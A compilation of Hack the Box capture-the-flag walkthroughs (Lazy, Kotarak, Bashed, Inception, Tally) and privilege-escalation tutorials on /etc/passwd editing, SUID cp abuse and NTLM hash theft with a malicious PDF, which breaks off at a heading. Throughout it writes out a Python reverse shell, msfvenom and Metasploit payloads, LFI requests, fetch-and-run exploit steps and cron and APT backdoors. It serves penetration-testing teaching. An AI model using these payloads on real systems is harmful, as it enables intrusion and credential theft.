Hello Friends!! Today we are going to solve a CTF Challenge "Lazy". It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Lazy is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Lazy Lab has IP: 10.10.10.18.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.18

As you can see in the given screenshot that we have two services running on our Target Machine, ssh and HTTP on ports 22 and 80 respectively.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by a simple page with Register and Login Links. Clicking on the Register opens up a form.

Then I decided to register as admin: 123 for username and password respectively.

But I got an alert “Duplicate entry ‘admin’ for key PRIMARY”, also received error "can't create user: user exists" when I registered as admin. Hence username "admin" is already registered, now we though to crack the password for login but that was quite tough to crack.

At last, I decide to use burp suite for capturing browser request. Here I simply register with aadmin as username and password 123.

And got intercepted request, here I saw auth cookie. Then I send the intercept request to the repeater for analyses its response. It gave a hint "invalid padding" which means there could be padding oracle vulnerability. To know more about what is padding oracle vulnerability read our previous article from here. Since I had already faced such situation in my past experience, therefore, I know what to do next.

Next open terminal to run the command shown in the given image which contains target URL and above-copied auth cookie

Further type 2 where it asked ID recommended

Last part of screenshot has captured three decrypt values in base64, HEX and ASCII. The cookie of auth is a combination of username with its password from padbuster we come to know what is the encrypted value of username for admin.

We are very near to our goal just encrypt this auth cookie with the user as admin once again. Here we have our plaintext as admin and let's encode it using padbuster.

Further type 2 where it asked ID recommended. Here the highlighted part is our encrypted value for admin. Copy It “BAit——–AAAA”.

Now replace the original auth cookie from the encrypted value which you have copied above and forwarded the intercepted request.

When request sent by burp suite, automatically on the web server you will get logged in as an admin account. After that when you will access the admin page you will get a URL “my key” that offers us with a username mitsos and an ssh key.

So as you can observe that we had opened the ssh key let's save it into a text file as "key" on the desktop and if you notice the URL can read ssh login username mitsos.

First, let's download the key and then give appropriate permission using the chmod. Now that we have the ssh username and key let’s get an ssh session.

ssh -I key mitsos@10.10.10.18

After successfully accessing PTY shell of a victim system, a simple ‘ls’ command shown us that we have the user.txt. Congrats we got our user flag.

Now, let's work on the root flag.

As we saw in the screenshot above that we the peda and backup folder too. We tried working around it but nothing useful seems to come up. On running the executable backup we saw that it prints the shadow file with user hashes. So we ran the strings command and found that it does contain command “cat /etc/shadow”

Now, all we needed to do was to create a personalized executable cat file, which can be done as shown in below image. Here we are reprogramming cat to give us the shell, on execution.

Now I will have to set $PATH, firstly let's see the $PATH using the echo command

echo $PATH

Now exporting Path

export PATH=’/home/mitsos’ :$PATH

Here what we did was add the home/mitsos in the $PATH because we have created that personalized cat file here. Now if we ran the backup executable, our cat will get executed.

But Lets First give the proper permission to the personalized cat file we created.

chmod 777 cat

Now let’s execute the backup to see if we get the shell. Great! We have the root shell.

Now all left is to get to the root directory and get the flag. But remember we have the $PATH changed so to run the cat command we will have to specify the location.

/bin/cat root.txt.

Great!! We got our root flag successfully

And this way, we successfully solved our challenge. YAY!

Hello friends!! Today we are going to solve another CTF challenge “Kotarak” which is available online for those who want to increase their skill in penetration testing and black box testing. Kotarak is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Hard

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.55 so let’s begin with nmap port enumeration.

nmap -p- -A 10.10.10.55 --open

From given below image, you can observe we found port 22, 8009, 8080, 60000 are open in victim’s network.

As port 8080 and 60000 are running HTTP, we open the IP in our browser and access the page through port 8080. As soon as we open the ip in our browser we get a tomcat authentication prompt asking for username and password.

When we access the site through port 60000, we find a page that can be used to access the internet.

Now we need to use the dirb tool to enumerate the directories of the target machine.

dirb http://10.10.10.55:60000/

From given below image you can observe the highlighted directory that is put up by dirb in its output result.

We now try to check if the page is vulnerable to SSRF or not by trying to access a forbidden page on the target machine.

when we open server-status through the vulnerable page, we are able to access the forbidden content. We then find that port 888 is listening locally on the target machine.

Then we opened http://localhost:888 through URL and it contains a few links to different files.

We open backupand find that it was empty.

To gain further information we used curl to access the page and find that it is an XML file that contains a username and password.

curl http://10.10.10.51:60000/url.php?path=localhost:888/?doc=backup

We use the above credentials to login into tomcat manager application through port 8080.

As we were able the right credentials for tomcat server, we found that it was vulnerable to this exploit here. We used metasploit to exploit this vulnerability.

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set httpusername admin

msf exploit(multi/http/tomcat_mgr_upload) > set httppassword 3@g01PdhB!

msf exploit(multi/http/tomcat_mgr_upload) > exploit

Finally, we got the meterpreter session as shown in the below image

After gaining the reverse shell we start enumerating the target system. In /home/tomcat/to_archive/pentest_data we find a few interesting files.

In /home/tomcat/to_archive/Pentest_data we find a directory information tree file and binary file.

We download both the files into our system.

We used impacket-secretsdumpto dump hashes inside the files.

We were able to crack one of the hashes and find it to be f16tomcat!

We use this to login as atanas, we then move into /root/ folder and find a file called flag.txt. When we open it we find that it was a dummy flag file.

In the root directory, we also find a log file when we take a look at the content of the file we find that it contains log that we were created using wget. We also find that the wget version used is 1.16

Searching on the Exploit-DB site we find that this version of wget was vulnerable to remote code execution.

We follow the instructions given on exploit-db.com about how to exploit this vulnerability.

Then we had opened the wgetrc file through vim for changing the path of Post_filefrom /etc/shadow into /root/root.txt

We download the code of this exploit from exploit-db.com and upload it to the target machine through meterpreter.

We then give read, write and execute permission to the file.

We then use authbindto run the file, as authbind allows a program to that would normally require super userprivileges to access privileged network services to run as a non-privileged user. As soon as we run the exploit we get the root flag.

Hello Friends!! Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Bashed is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Bashed Lab has IP: 10.10.10.68.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.68

Knowing port 80 was open on victim’s network we preferred to explore his IP in the browser and the following image as shown below.

Next, we use the dirb tool of kali to enumerate the directories and found some important directories such as /dev

So when you will open /dev directory in the browser, you will get a link for phpbash.php. Click on that link.

It will redirect to the following page as shown below, which seems like a shell interacting through the browser.

After that, you can execute any os arbitrary command for testing whether it’s working or not. We have run ls command to check present list in the current directory.

Inside /html directory we found uploads folderand hence now we can easily compromise the target’s system by uploading backdoor.

Using msfvenom we had created a malicious shell.php file by executing following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw

Simultaneously run multi/handler for reverse connection of victim’s system.

We had used Python HTTP server for transferring file, you can also use an alternative method for transferring and download the malicious file from wget inside uploads directory.

Now execute the malicious file shell.php from the browser as shown below and move to metasploit framework for reverse connection.

After executing uploaded backdoor file come back to Metasploit framework and wait for meterpreter session.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.28

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it.

cd home

Here one directories arrexel, when I explore /home/arrexelI saw user.txt and use cat command for reading.

cd arrexel

cat user.txt

Great!! Here we had completed 1^st task now move to 2^nd task

For spawning proper tty shell of target’s system we need to import python file, therefore, I run following command inside meterpreter shell

shell

python-c'import pty;pty.spawn("/bin/bash")'

lsb_release -a

Run ls-al commandto observe all directories with their permissions. Here you will notice the user scriptmanager has permission for accessing /scripts directory.

When we tried to open /scripts directory as the default user, it shows Permission Denied message. Then run sudo -l command which will tell us that the scriptmanager has No password of all things.

Then we run following command for penetrating scripts folder with help of scriptmanager

sudo -u scriptmanager ls /scripts

sudo -u scriptmanager cat /scripts/test.py

sudo -u scriptmanager cat /scripts/test.txt

Since we found a python file, therefore, our strategy will be to replace the original test.py file from malicious python file to have a reverse connection over netcat and for that, you need to save following code in a text file.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Save this file with .pyextension and transfer it into victim’s system and start netcat on listening port.

Note: Replace 10.10.14.28 from inside the code into your VPN IP.

Now download malicious python file inside /tmp

wget http://10.10.14.28/root.py

And then copy the root.py from inside /tmp into test.py in /script with the help of following command.

sudo -u scriptmanager cp /tmp/root.py /scripts/test.py

After some time you will get reverse connect at netcat terminal with root access. Now finished the task by capturing root.txt file as shown below.

nc -lvp 1234

cd /root

cat root.txt

2^nd Method for finding root.txt flag.

We find machine architecture 14.0 in above method. So we start looking for a related kernel exploit in Google and luckily found an exploit from herefor root privilege escalation.

Copy and paste the whole text inside a text file and save as poc.c

After that compile it with help of the following command:

gcc poc.c -o pwn

Run python HTTP server for transferring it into targets system.

At last, download complied file pwn into target machine from wget inside /dev/shm as shown in the image then give full permission and run the file.

wget http://10.10.14.28/pwn

chmod 777 pwn

./pwn

It will give you root access, now catch the root.txt flag as soon as possible because it will crash the kernel after some time.

cd /root

cat root.txt

Superb!! We had completed the task and hacked this box.

Hello friends!! Today we are going to solve another challenge “Inception” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy, you have to use your entire Penetration testing skills. Let start and learn how to breach a network and then exploit it for retrieving desired information.

Level: Hard

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Inception is 10.10.10.67 so let’s start with nmap port enumeration.

nmap -A 10.10.10.67

From given below image, you can observe we found port 80 and 3128 are open in victim’s network.

Knowing port 80 was open on victim’s network we preferred to explore his IP in the browser and the following image get opened as shown below.

Then we check its source code and found something “dompdf” which could be a directory, so let’s go through it.

So when we had explored /dompdf in the browser, it put up some files. I was interested in version so we opened it and found version 0.6.0

After that with help of searchsploit, we got an exploit 33004.txt for dompdf 0.6.0.

In this exploit, you will get an instance for exploiting the target machine with help of LFI.

Then without wasting time we look for /etc/passwd file with help of the following command:

curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd

But we got an encoded result, therefore, we need to decode it.

From given below image you can observe that we have successfully decoded base 64 data and can read first username Cobb.

And after penetrating very deep, we found default.conf file inside apache which holds another base64 value, now uses given below command for that.

http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf

After decoding above found base64 value, you will get a highlighted path for authuserfile as shown below in the given image. If you will read the text inside location tag , you will realize that it is giving hint for login credential for /webdev_test_inception and more security details such as authentication type: basic.

Again type the following command:

curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd

Hmmmmm!!! One more base64 value, let’s decode this also.

So when we had decoded above based 64 value and found a hash value for user “webdav_tester” from it. Here we had copied it into a text file and now going to use john the ripper for cracking this hash.

Type following command for cracking hash value with the help of /rockyou.txt

john hash --wordlist=/usr/share/wordlists/rockyou.txt

So currently we have our username “webdav_tester” and the password “babygurl69” for login into /webdev_test_inception and authentication type is also basic therefore we can use cadaver for uploading backdoor.

Type following command for uploading php backdoor:

cadaver http://10.10.10.67/webdav_test_inception

webdav_tester

babygurl69

put /root/Desktop/qsd-php-backdoor.php

While uploading php backdoor we had tried so many types of php backdoor but among them qsp-php-backdoor.php was working and it is default location is /usr/share/webshells/php.

Then we open uploaded php shell in the browser and click on “go to current working directory”.

http://webdav_test_inception/qsd-php-backdoor.php

It brings us into inside /html directory, where we saw wordpress 4.8.3 and opened it.

Then we explore /wp-config.php file and found username “root” and password “VwPddNh7xMZyDQoByQL4". We also tried to login to wordpress but it was not active.

Again we came back to the previous page as shown below and type the following command inside execute shell text filed for identifying all running services inside the network.

netstat antp

Here we found ssh is open inside internal network and also observed new interface 192.168.0.10

Since we know port 3128 is open for squid http proxy, so now open /etc/proxy.conf to add that inside it as shown below in the image.

Now connect to ssh through proxychains by using below command and submit password that was found from inside /wp-config.php for user cobb.

proxychains ssh cobb@127.0.0.1

Nice!!! It works and we logged in successfully, let’s grab the user.txt first as shown.

Then for finding root.txt flag, we need privilege escalation, therefore, type sudo -lcommand which will tell you sets permission for user cobb. And you will see that Cobb has ALL permissions. Then further we execute sudo su and got root access and move for root.txt file.

Dammitttttttt!!!!! It was a bloody trap, not original root access.

ifconfig tells us IP is 192.168.0.10 and then we ping thought to ping 192.168.0.1, and the host was up.

Then with help of the following command, we came to know port 21, 22 and 53 was opened.

nc -zv 192.168.0.1 1-65535 &> results && cat results | grep succeeded

We successfully login into ftp by using anonymous: anonymous and run ls command for looking all directories and files.

Inside /etc we saw three files: passwd, crontab and tftpd-hpa in /default. We downloaded all three files.

cd /etc

put passwd

put crontab

cd default

put tftpd-hpa

Then read all three file through cat

cat /etc/passwd

cat /default/tftpd-hpa

cat crontab

Here we saw something very interested that every 5 minutes apt-update command is running.

Then we generated ssh key by executing following command:

ssh-keygen

Now enter following commands for uploading public key on 192.168.0.1 using TFTP:

cd /root/.ssh

tftp 192.168.0.1

put id_rsa.pub /root/.ssh/authorized_keys

Since tftp gives all permission to the authorized key which means anyone can read and write it as result ssh public key get fail due to incorrect permission, it should 600. Now exit from tftp and change authorized key permission in the current host machine.

quit

We were not much sure how to change permission through apt-update command, therefore, we search in Google and luckily found a linkthat helps us in generating apt update command for changing authorized key permission.

echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};'> rootshell

tftp 192.168.0.1

put rootshell /etc/apt/apt.conf.d/rootshell

quit

ssh root@192.168.0.1

Wait for 5 mins and then you will get root access. After that grab the root.txt flag and Hit the GOAL!!!

Hello Friends!! Today we are going to solve a CTF Challenge “Tally”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Tally is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Tally Lab has IP: 10.10.10.59.

Now, as always let’s begin our hacking with the port enumeration.

nmap -p- -A 10.10.10.59

When you will explore target IP through the browser, it will be redirected to a SharePoint page as shown below which also declared by nmap in above image.

Then we have used several directory brute-forcer tools in order to enumerate some useful URL for web directory but failed to retrieve. Then I penetrate for the web directory manually with the help of Google search and slowly and gradually reached at /sitepages/FinanceTeam.aspx and found ftp username as shown below in the image.

Moreover, I found a linkfor SharePoint directory brute-force attack that helps me in my next step.

We found this URL http://10.10.10.59/shared documents/forms/allitems.aspx from inside above-given link, and when you will open above path in your browser as shown below, you will see a file named "ftp-details". Download this doc file and open it.

You will get a password from inside ftp details doc file.

Now login into FTP using following credentials and download tim.kdbx in your local machine.

Username:ftp_user

Password: UTDRSCH53c"$6hys

Since the file contains .kdbx extension and I don't know much about it, therefore, I jumped for Google search from there I got this linkto download a python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.

python keepass2john.py tim.kdbx > tim

Next, we have used John the ripper for decrypting the content of “tim" with help of the following command.

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim

When you will obtain the password for “keepass2” which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command:

apt-get install keepass2 -y

After installing, run the below command and submit “simplementeyo" in the field of the master key.

keepass2 tim.kdbx

Then you can find username and password from inside /Work/Windows/Shares for sharing a file through SMB login, since port 135-445 are open in targets machine for sharing files.

Here the password is hidden inside * character; copy and paste it into a text fileand you will get the password into plain letters I.e. Acc0unting .

Now you are having SMB login credential “Finance: Acc0unting”, then execute following command for connecting with targets network and It will show “ACCT” as sharename.

smbclient -L 10.10.10.59 -U Finance

Further type below commands and at last when you found conn-info.txt, download it.

smbclient //10.10.10.59/ACCT -U Finance

cd zz_Archived

cd SQL

get conn-info.txt

When you will download conn-info.txt file, open it, it will tell you MSSQL database login credential.

db: sa

pass: YE%TJC%&HYbe5Nw

From below image you can observe that, it was old server details and might be the password for sa has been changed now.

Again login into SMB and look for next hint by moving into /zz_Migration, for that you need to execute below commands:

smbclient //10.10.10.59/ACCT -U Finance

cd zz_Migration

cd Binaries

cd "New folder"

Here you will found tester.exe, download it.

get tester.exe

You will get tester.exe inside your /root directory since the file is too large, it is impossible to find desirable information from that. Therefore use grep along with strings command.

strings tester.exe | grep DATABASE

And you will get a new password for user sa as shown in below image.

For next step I took help from our previousarticle which was on MSSQL penetration testing. Open a new terminal and load metasploit framework and execute below commands.

use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set target 3

msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28

msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28

msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for .dll and Pasteit inside as CMD command as shown in next image.

Now open new terminal and again load a new metasploit framework and execute below commands.

use auxiliary/admin/mssql/mssql_exec

msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59

msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G

msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"

msf auxiliary(admin/mssql/mssql_exec) > exploit

You will get meterpreter session of victim’s machine in your 1^st metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:

getuid

So currently we don’t have NT AUTHORITY\SYSTEM permission.

But we have successfully grabbed user.txt file from inside /Sarah/Desktop.

cd Sarah/Desktop

cat user.txt

In this way we have completed our first task. Now let's find root.txt!!

load incognito

Incognito option in meterpreter session was originally a stand-alone application that permitted you to impersonate user tokens when successfully compromising a system. And then we need to do first is identify if there are any valid tokens on this system

list_token -u

If we talk related to impersonate token then you can see currently there is no token available.

Then I took help from Google in such scenario and found a link for downloading Rottenpotatofrom github for privilege escalation.

git clone https://github.com/foxglovesec/RottenPotato.git

After downloading it will give rottenpotato.exe file.

Upload the exe file into victim's machine.

upload /root/Desktop/RottenPotato/rottenpotato.exe .

Now type below command for executing exe file and then add SYSTEM token under impersonate user tokens.

execute -Hc -f rottenpotato.exe

impersonate_token "NT AUTHORITY\\SYSTEM"

After then when you will run getuid command again, it will tell you that you have escalated NT AUTHORITY\\SYSTEM

Then come back to /Users directory and perceive available directories inside it. You will get root.txt form inside C:\Users\Administrator\Desktop go and grab it, and finished the task.

cd Administrator

cd Desktop

cat root.txt

Fabulous!! The task has been completed and hacked this box.

In this article, we will learn "Various methods to alter etc/passwd file to create or modify a user for root privileges”. Sometimes, it is necessary to know ‘how to edit your own user for privilege escalation in machine’ inside /etc/passwd file, once target is compromised.

Firstly, we should be aware of /etc/passwd file in depth before reaching to the point. Inside etc directory, we will get three most important files i.e. passwd, group and shadow.

etc/passwd: It is a human-readable text file which stores information of user account.

etc/group: It is also a human-readable text file which stores group information as well as user belongs to which group can be identified through this file.

etc/shadow: It is a file that contains encrypted password and information of account expire for any user.

The format of details in /passwd File

Get into its Details Description

1. Username:First filed indicates the name of the user which is used to login.

2. Encrypted password: The X denotes encrypted password which is actually stored inside /shadow file. If the user does not have a password, then the password field will have an * (asterisk).

3. User Id (UID): Every user must be allotted a user ID (UID). UID 0(zero) is kept for root user and UIDs 1-99are kept for further predefined accounts, UID100-999 are kept by the system for administrative purpose. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given the UID of 1001.

4. Group Id (GID): It denotes the group of each user; like as UIDs, the first 100 GIDs are usually kept for system use. The GID of 0 relates to the root group and the GID of 100 usually signifies the user's group. New groups are generally allotted GIDs begins from 1000.

5. Gecos Filed: Usually, this is a set of comma-separated values that shows extra information about the users. The format for the GECOS field denotes the following information:

i) User's full name

ii) Building and room number or contact person

iii) Office telephone number

iv) Home telephone number

v) Any other contact information

6. Home Directory: Denotes the path of user’s home directory, where all his files and programs are stored. If there is no specify directory then /becomes user’s directory.

7. Shell:It denotes the full path of the default shell that executes commands (by user) and displays the results.

NOTE: Each field is separated by : (colon)

Let’s Start Now!!

Adding User by Default Method

Let’s first open /etc/passwd file through cat command, to view the present users available in our system.

From image given above, you can perceive that “raj” is the last user with uid 1000. Here gid 1000 denotes it is a non-system user.

Let see what happens actually in /passwd file, when we add any user with adduser command. So here you can clearly match the following information from below given image.

adduser user1

Username: user1

GID: 1002

UID: 1001

Enter password: (Hidden)

Home Directory: /home/user1

Gecos Filed: Full Name, Room Number, Work phone, Home Phone, Other (are blanked)

When you will open /passwd file then you will notice that all above information has been stored inside /etc/passwd file.

Manually Editing User inside /etc/passwd File

Generally, a normal user has read-only permission for passwd file but sometimes it is also possible that a user has read/write permission, in that scenario we can add our own user inside /etc/passwd file with help of above theory.

user2:*:1002:1003:,,,:/home/user2:/bin/bash

The *(asterisk) sign denotes empty password for user2.

Since we have allotted 1003 GID for user2, therefore, we need to address it in /etc/group file tool.

Follow the format given below:

Syntax:Username:X:GID

Since we don't have password, therefore, use * sign at the place of X.

user2:*:1003

Now, set a password for user2 with passwd command and enter the password.

passwd user2

Since we have created new user ‘user2’ manually without using adduser command, we will not find any new entry in /etc/shadow file. But it’s there in /etc/passwd file, here the * sign has been replaced by encrypted password value. In this way, we can create our own user for privilege escalation.

Editing User using Openssl

Sometimes it is not possible to execute passwd command to set the password of a user; in that case, we can use openssl command which will generate an encrypted password with salt.

OpenSSL passwdwill compute the hash of the given password using salt string and the MD5-based BSD password algorithm 1.

Syntax: openssl passwd -1 -salt [salt value] {password}

openssl passwd -1 -salt user3 pass123

We will get the encrypted password, after that, open /passwd file by typing vipw commandin terminal and add username manually. Follow the manual step of adding new user "user3" and paste encrypted value at the place of * or X for a password.

In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user3.

Now switch user and access the terminal through user3 and confirm the root access.

su user3

whoami

YESSSSSS it is working successfully.

Note: You can also modify other user’s password by replacing: X: from your own encrypted passwd and login with that user account using your password.

Editing User using mkpasswd

mkpasswd is similar as openssl passwd which will generate a hash of given password string.

Syntax:mkpasswd -m [hash type] {password}

mkpasswd -m SHA-512 pass

It will generate a hash for your password string, repeat above step or change the password of other existed users.

If you will compare entry of user1 then you can notice the difference. We have replaced: X: from our hash value.

Now switch user and access the terminal through user1 and confirm the root access.

su user1

whoami

Great!! It is also working.

Editing User using Python

Using python we can import crypt library and add salt to our password which will create encrypted password including salt value.

python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'

It will generate a hash value of your password string, repeat above step or change the password of other existed users. If you will compare entry of user2 then you can notice the difference. We have replaced old hash value from our new hash value.

Now switch user and access the terminal through user2 and confirm the root access.

su user2

whoami

pwd

sudo -l

It is also working, previously it was a member of /home/user2 directory but after becoming a member of /root directory you can notice it has owned all privilege of the root user.

Editing User using Perl

Similarly, we can use Perl along with crypt to generate a hash value for our password using salt value.

perl -le 'print crypt("pass123", "abc")'

You will get the encrypted password, after that, open /passwd file by typing vipw commandin terminal and add username manually. Follow the manual step of adding new user “user4" and paste encrypted value at the place of * or X for a password.

In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user4.

Now switch user and access the terminal through user4 and confirm the root access.

su user4

whoami

Great!! This method is also working.

Editing User using PHP

Similarly we can use PHP along with crypt to generate hash for our password using salt value.

php -r "print(crypt('aarti','123') . \"\n\");"

You will get the encrypted password, after that, open /passwd file by typing vipw commandin terminal and add username manually. Follow the manual step of adding new user “user5" and paste encrypted value in field of password.

In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user5.

Now switch user and access the terminal through user5 and confirm the root access.

su user5

whoami

Hence there are so many ways to add your own users with root access which is quite helpful to get root privilege in any machine.

Today we are demonstrating stealing NTLM hashes through a pdf file. We have already discussed the various method to Capture NTLM Hashes in a Network in our previousarticle. Recently a new tool has launched “Bad-PDF" and in this article, we are sharing our experience.

Bad-PDF create malicious PDF to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines, it utilizes vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.

This method work for all PDF readers(Any version) and java scripts are not required for this attack, most of the EDR/Endpoint solution fail to detect this attack.

git clone https://github.com/deepzec/Bad-Pdf.git

cd Bad.Pdf

chmod 777 badpadf.py

Now run the python file with the help of following command given below:

python badpdf.py

Then it will try to connect with Responder through its default path i.e. /user/bin /responder but in our case, the location of the responder is user/sbin/responder. After then it will ask your network IP, the name of the output file and interface name, submit this information as per your network.

Then it will create a malicious pdf file with name bad.pdf, now transfer this pdf file to your target.

So, when the victim will click our malicious file, his NTLM hash will be captured as shown in below image. Here you can observe username ‘raj’ along with its hash password. Now copy the hash value in a text document so that you can crack this hash value for retrieving the password.

We have paste the hash value in a text file and save it as "hash" on the desktop. Later we had used John the ripper for cracking the hash.

john hash

Awesome!!! We have retrieved password: 133 for user: raj.

In our previousarticle we have discussed “Privilege Escalation in Linux using etc/passwd file” and today we will learn “Privilege Escalation in Linux using SUID Permission.” While solving CTF challenges we always check suid permissions for any file or command for privilege escalation. It is very important to know what SUID is, how to set SUID and how SUID helps in privilege escalation.You can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link 1: Hack the Box Challenge: Bank Walkthrough

Link 2: Hack the Box Challenge: Haircut Walkthrough

Let’s Start with Theoretical Concept !!

As we all know in Linux everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read/write/execute. So when you set permission for any file, you should be aware of Linux users to whom you are going allow or restrict all three permissions. Take a look at the following image.

Hence it is clear that the maximum number of bit is used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set chmod 755, then it will look like as rwxr-xr-x.

But when special permission is given to each user it becomes SUID, SGID and sticky bits. When extra bit “4” is set to user(Owner) it becomes SUID (Set user ID) and when bit “2” is set to group it becomes SGID (Set Group ID) and if other users are allowed to create or delete any file inside a directory then sticky bits“1” is set to that directory.

What is SUID Permission?

SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges. Assume we are accessing target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.

How to set suid?

Basically, you can change the permission of any file either using "Numerical" method or "Symbolic" method. As result, it will replace x from s as shown in below image which denotes especial execution permission with the higher privilege to a particular file/command. Since we are enabling SUID for Owner (user) therefore bit 4 or symbol s will be added before read/write/execution operation.

If you execute ls -al command with the file name and then you will observe symbol small‘s’ as in above image then its means SUID bit is enabled for that file and it can be run with root privileges.

HOW SUID helps in privilege escalation?

In Linux, some of the existing binaries and commands can be used by non-root user to escalate privileges to root access if the SUID bit is enabled. There are some famous Linux/Unix executables commands that can let privilege escalation are: Bash, Cat, cp, echo, find, Less, More, Nano, Nmap, Vim.

Let's get into deep through practical work. First, create a user which should be not the sudo group user. Here we have added user “ignite” whose UID is 1001 and GID is 1001 and hence ignite is non-root user.

Privilege Escalation by Copy Command

If suid bit is enabled for cp command which is used to copy the data, then it can lead to privilege escalation to gain root access. For example, suppose you (system admin) want to give SUID permission for cp command. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which cp

ls -al /bin/cp

chmod u+s /bin/cp

1^st Method

On other hands start yours attacking machine and first compromise the target system and then move to privilege escalation phase. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

In above image, you can observe that it is showing so many files but we are interested in /bin/cp file. Because now we can copy /etc/password file for reading user list. Therefore I copy /passwd file inside HTML directory.

cp /etc/passwd /var/www/html

On other hands we have generated a new encrypted password: pass123 using OpenSSL passwd

We have copied /passwd file inside the web directory i.e. /var/www/html, therefore I can open it through the web browser then copied the entire content of /password file in a text file and after then we can add our own user withroot UID, GID and directory.

In our previous article, we have already discussed how to add a user /etc/passwd using openssl passwd utility.

Run Python HTTP server for transferring our edited passwd file into target’s machine.

python-mSimpleHTTPServer80

As we all know /tmp directory has all permission to create or delete any file, therefore, we have download our passwd file inside it. Once it gets downloaded after then we copied the data of /tmp/passwd into /etc/passwd as result it will overwrite original passwd file.

cd /tmp

wget http://192.168.1.108/passwd

cp passwd /etc/passwd

With the help of tail command, we ensured that our user "hack" is either the part of /etc/passwd file. Since we have added our own user with root privileges let's get into the root directory.

su hack

whoami

And Yessssssss !! This is an incredible way to escalated root privilege.

2^nd Method

Similarly, we can also transfer our backdoor in target's system if SUID bit is enabled for cp command. Here we have generated natcat backdoor for reverse connect using msfvenom command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

Then copy the above-highlighted code and paste in a text file by editing #!/bin/bash then ready to transfer it into target’s system, I have saved it as raj.sh.

Now we all are aware of Linux crontab utility that runs file hourly, daily, weekly and monthly and thus I copied raj.sh inside /etc/cron.hourly. Hence it will run raj.sh file after one hour.

cp raj.sh /etc/cron.hourly/

ls -al /etc/cron.hourly/

Other hands we started Netcat listener in a new terminal and as the hour past it gives reverse connect of target’s system with root privileges.

Hence we saw how a single cp command can lead to privilege escalation if SUID bit is ON. You can try your own way to escalated root privilege using cp command.

Privilege Escalation by Using Find Command

